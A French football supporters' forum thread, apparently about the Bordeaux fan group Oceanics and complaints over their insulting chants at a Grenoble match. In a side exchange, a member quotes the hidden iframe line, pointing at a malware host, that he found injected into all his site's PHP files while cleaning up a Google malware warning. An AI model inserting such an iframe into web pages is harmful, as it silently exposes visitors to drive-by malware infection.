Jump to content
Guest goren33

Oceanics Nord Bordèu

Recommended Posts

Guest Pelicano

Beh ceu qu'il serait gavé bien c'est que nous on lance aux armes et vous le GI-RON-DINS! ça serait cool :)

Par contre ne pas faire les chants en même temps l'histoire des talkie walkee c'ets pour coordoner nos chants pour le aux armes ou des trucs comme ça!

Mais je pense pas qu'il y ait des guerres de tribune Le sud restera toujours le Sud et le Nord le virage Myriade :P

 

Share this post


Link to post
Share on other sites
Guest Altharian

La même chez moi.

 

Edit : j'ai essayé d'ignorer l'avertissement (qui est revenu à 3 reprises quand même), et en fin de compte avast m'envoie un message comme quoi j'ai une menace de cheval de troie en me connectant à ton site... Donc j'ai préféré abandonner la connexion.

Share this post


Link to post
Share on other sites
A chaque fois que j'ouvre un de tes liens, on me dis que ton site est malveillant. Ca vient de chez moi ou bien?

 

Ah oui, tu ouvres avec Firefox ?

C'est Google qui me signal en tant que Malveillant ... je ne comprend pas pourquoi

Je n'ai strictement rien sur mon site qui peut être suspect (des liens vers des site safe ... mes jeux en down ... de toute facon j'ai analysé 20 fois tout les fichiers il n'y a rien)

 

Donc c'est soit un rigolo qui a signalé mon site à Google comme étant dangereux; soit le Robot de Google à trouvé un truc ... mais j'aimerai qu'on me dise quoi.

J'ai envoyé une requête d'analyse à Google; j'attends le résultat (pas avant une semaine...)

 

En attendant, si vous me faites confiance (je l'espère :Invision-Board-France-596: ) ajoutez mon site dans la liste des exceptions de Firefox: Outils/Options/Sécurité/Exceptions

 

J'ai la même alerte sur mon Cpannel ... fichiers auquel je ne touche pas.

Ca ressemble plus à une alerte sur mon nom de domaine

(Vu que les sous domaines FCGB et FOCALE ont le même problème)

Share this post


Link to post
Share on other sites

J'ouvre avec Firefox oui.

J'ai pas de problème de confiance, puisque j'ouvre quand même les fichiers. Mais du coup, je préfère te prévenir au cas où. Mais comme tu sembles au courant, y'a pas de raison.

 

Edit : j'ai essayé d'ignorer l'avertissement (qui est revenu à 3 reprises quand même), et en fin de compte avast m'envoie un message comme quoi j'ai une menace de cheval de troie en me connectant à ton site... Donc j'ai préféré abandonner la connexion.

 

Pas eu de problème avec Antivir... Je sais donc pas ce qu'il en est.

Share this post


Link to post
Share on other sites
La même chez moi.

 

Edit : j'ai essayé d'ignorer l'avertissement (qui est revenu à 3 reprises quand même), et en fin de compte avast m'envoie un message comme quoi j'ai une menace de cheval de troie en me connectant à ton site... Donc j'ai préféré abandonner la connexion.

 

Tu peux me dire son nom ?

Et quelle site ça amène ?

Merci !

Share this post


Link to post
Share on other sites
Guest Altharian

Apparemment c'est effectivement un signalement via Google qui en est à l'origine :

 

 

 

 

Recommandation fournie par Google

Navigation sécurisée

Page de diagnostic pour b3dgs.com

 

Quel est l'état actuel du site Web b3dgs.com ?

 

Ce site est considéré comme suspect et vous risquez d'endommager votre ordinateur si vous le visitez.

 

Une partie de ce site a été répertoriée 1 fois comme générant une activité suspecte au cours des 90 derniers jours.

 

Que s'est-il passé lorsque Google a visité ce site ?

 

Sur les 2 pages testées sur ce site au cours des 90 derniers jours, 2 page(s) a (ont) généré le téléchargement et l'installation de programmes malveillants sans l'autorisation de l'internaute. Google a visité ce site pour la dernière fois le 2009-08-09 et un contenu suspect a été détecté sur ce site pour la dernière fois le 2009-08-09.

 

Malicious software includes 2 trojan(s).

 

Le programme malveillant est hébergé sur 1 domaine(s), dont chura.pl/.

 

This site was hosted on 1 network(s) including AS16265 (LEASEWEB).

 

Ce site a-t-il servi d'intermédiaire pour la diffusion de programmes malveillants ?

 

Au cours des 90 derniers jours, b3dgs.com ne semble pas avoir servi d'intermédiaire pour l'infection de sites Web.

 

Ce site a-t-il déjà hébergé des programmes malveillants ?

 

Non, ce site n'a pas hébergé de programmes malveillants au cours des 90 derniers jours.

 

Comment cela s'est-il produit ?

 

Dans certains cas, des tiers peuvent ajouter un code malveillant à des sites Web légitimes, ce qui nous amène à afficher le message d'avertissement.

 

Étapes suivantes :

 

* Revenir à la page précédente.

* Si vous êtes le propriétaire de ce site Web, vous pouvez demander une analyse de votre site à l'aide des Outils Google pour les webmasters. Pour plus d'informations sur cette procédure, consultez leCentre d'aide Google pour les webmasters.

 

Updated 5 hours ago

 

©2008 Google - Accueil Google

Share this post


Link to post
Share on other sites

Désolé de pourrir ce post avec mes problème :moqueur2 pour WG:

 

Je termine avec ça en disant que j'ai trouvé

Tout mes PHP comportent une ligne de plus:

 

<iframe src="http://jL.chura.pl/rc/" style="display:none"></iframe>

 

Je met tout à jour

Et faudra que google me check à nouveau

Désolé pour le dérangement !

 

(Donc un virus peut modifier mes fichiers web sur mon disque dur ... flippant)

 

Edit: Ca remarche !

Share this post


Link to post
Share on other sites
BRAVO AUX OCEANICS !!! :ola2jp7: :Invision-Board-France-163:

 

Bon j'ai assisté à la rencontre de ce soir en Virage Nord, car je voulais voir à quoi ressemblait les Oceanics (et surtout car j'étais trop crevé pour rester debout au Sud :moqueur2 pour WG: ) et j'étais été très déçu, limite un peu dégouté...

 

Au niveau du groupe, un petit nombre mais suffisant pour mettre un peu d'ambiance, on imagine qu'avec le double, le virage pourrait vous suivre. Niveau matos, le minimum mais suffisant pour faire un peu de bordel, sur ca rien a dire...

 

Mais c'est plus l'animation qui a était grotesque, je peux vous dire que j'étais a coté de père de famille qui était évidemment choqué, et qui parlait déjà de faire une lettre au club... Car oui "Les bâtards de Grenoblois", "Les enculés pensionnaires de Ligue 2" répétait pendant quasiment toute la rencontre, c'était du pitoyable. Ajoutait à cela des doigts d'honneurs répété, un gros guignol qui faisait genre "Hé oui les Grenoblois vous avez des petites bites", ca fait vraiment chier.

 

Les supporters grenoblois, n'ont jamais cherché la merde (A part quand votre petit groupe s'amusait à les provoquer), la seule fois ou ils ont dérapé c'était contre l'un de leur joueur...

 

Alors je veux bien quand c'est des Marseillais en face mais la faut arrêter. Vous êtes dans un virage, ou il y'a beaucoup de famille et d'enfant, c'est pas le Sud les mecs, c'est pas ca que les gens recherchent quand il voit un groupe de sup qui est la pour animer un peu leur virage... C'est normal que personne veut vous suivre (ou quasiment), vous donnez vraiment une mauvaise image de vous... Je suis prêt à en discuter, mais croyez moi, c'est la dernière fois que je viendrais foutre mes pâtes au Virage Nord...

 

A bon entendeur...

Share this post


Link to post
Share on other sites

Surtout qu'a faire les malins, vous allez vous faire choper a un moment ....

 

Et le drapeau de la France, gardez le dans les cartons, pas la peine de le sortir (vous ne l'avez pas sorti, heureusement), même en coupe d'Europe -_-

Share this post


Link to post
Share on other sites
Guest goren33

on va s'expliquer sur ce forum quand a ce match car vous semblez tout de même plus intelligent...

 

Pour être franc vous êtes nombreux a nous faire le reproche des insultes... soit. Des pères de familles ? Si vous saviez le nombre de personnes qui sont père de famille dans le groupe et pourtant personne n'a été choqué. Je reconnais qu'on s'éloigne un peu de la mentalité du groupe avec ces insultes mais pour autant nous ne regrettons pas ce geste... ce n'est pas intelligent en soit mais cela fait partie du lot.. on va essayer de limiter tout ca dans le temps ( et pour votre gouverne , nous avons eu qq histoire avec les grenoblois.. rien de méchant mais qq échanges en ont découlés ).

 

Par contre la ou on est énervé c'est que c'est bien gentil de venir faire une lettre au club ( qui restera lettre morte je tiens a vous le préciser ) mais contre nice qui a envoyé une lettre pour les autres supporter ( et un papy de 65ans ) qui insulté les nicois ? Contre lens idem ? Alors aujourd'hui nous sommes la et nous reprenons ces insultes et donc forcément c'est nous qui prenons ce qui est normal mais il faut arrêter de dramatiser...

 

 

D'autant plus que les chants d'insultes se sont limités a 2... pas plus alors il faut arrêter de piquer des crises...les matchs précédent il y en a eu plus.. comme je l'ai dit on limite de match en match mais on ne peut pas tenir tout le monde alors quand 5personnes chante , le groupe suit forcément et voila ...Le reste de nos échanges avec les grenoblois si vous avez bien suivi était les "ce soir nous allons chanter"...

 

Dernière chose, merci de vous levez la prochaine fois. Si les insultes vous dérangent descender nous le dire ou venez chanter avec nous... on voit bien le match et au moins on s'active...car heuresement qu'il y avait une bonne 60aine de personne en bas car derrière ca ne suivant absolument pas...mais bon on le savait ...

Share this post


Link to post
Share on other sites

vous êtes des abrutis...

 

il y avait la place dans ce virage pour faire un truc "propre"...pour générer un courant de sympathie

chez les supporters "plus calme" et ainsi, petit à petit, les "agréger" à votre mouvement...

 

las...

 

vous ne valez pas mieux que les autres...mais pouvait-il en être autrement finalement ?

Share this post


Link to post
Share on other sites

Je ne vais pas au stade, mais je ne peux pas cautionner la moindre insulte et peu importe qui est en face.

 

Je n'ai jamais compris pourquoi les supporters ne s'époumonaient pas plus à encourager leur équipe au lieu de s'en prendre à l'équipe adverse.

 

Mais, "rassurons-nous", c'est partout pareil, à Sainté, il passe pas mal de temps à insulter les lyonnais, alors qu'il y aurait de quoi faire avec leurs propres joueurs ! :rolleyes:

 

Maintenant, je sais qu'il y a des gens difficile à "contrôler" dans les stades, mais j'espère que vous allez réussir à réduire les insultes à néant !

Share this post


Link to post
Share on other sites
on va s'expliquer sur ce forum quand a ce match car vous semblez tout de même plus intelligent...

 

Pour être franc vous êtes nombreux a nous faire le reproche des insultes... soit. Des pères de familles ? Si vous saviez le nombre de personnes qui sont père de famille dans le groupe et pourtant personne n'a été choqué. Je reconnais qu'on s'éloigne un peu de la mentalité du groupe avec ces insultes mais pour autant nous ne regrettons pas ce geste... ce n'est pas intelligent en soit mais cela fait partie du lot.. on va essayer de limiter tout ca dans le temps ( et pour votre gouverne , nous avons eu qq histoire avec les grenoblois.. rien de méchant mais qq échanges en ont découlés ).

 

Par contre la ou on est énervé c'est que c'est bien gentil de venir faire une lettre au club ( qui restera lettre morte je tiens a vous le préciser ) mais contre nice qui a envoyé une lettre pour les autres supporter ( et un papy de 65ans ) qui insulté les nicois ? Contre lens idem ? Alors aujourd'hui nous sommes la et nous reprenons ces insultes et donc forcément c'est nous qui prenons ce qui est normal mais il faut arrêter de dramatiser...

 

 

D'autant plus que les chants d'insultes se sont limités a 2... pas plus alors il faut arrêter de piquer des crises...les matchs précédent il y en a eu plus.. comme je l'ai dit on limite de match en match mais on ne peut pas tenir tout le monde alors quand 5personnes chante , le groupe suit forcément et voila ...Le reste de nos échanges avec les grenoblois si vous avez bien suivi était les "ce soir nous allons chanter"...

 

Dernière chose, merci de vous levez la prochaine fois. Si les insultes vous dérangent descender nous le dire ou venez chanter avec nous... on voit bien le match et au moins on s'active...car heuresement qu'il y avait une bonne 60aine de personne en bas car derrière ca ne suivant absolument pas...mais bon on le savait ...

Insulte au Grenoblois toute le 2eme periode et une toute petite 20nes de personnes en comptant les enfants, voila le resume de la soiree des Oceanics. J'en ai ete le temoin priviliege.Desole de vous dire que si vous continuez sur cette route, votre groupe va etre assimile au mouvement Ultra et ne pourra pas etre fiable sur le long terme .

Share this post


Link to post
Share on other sites
Guest
This topic is now closed to further replies.

×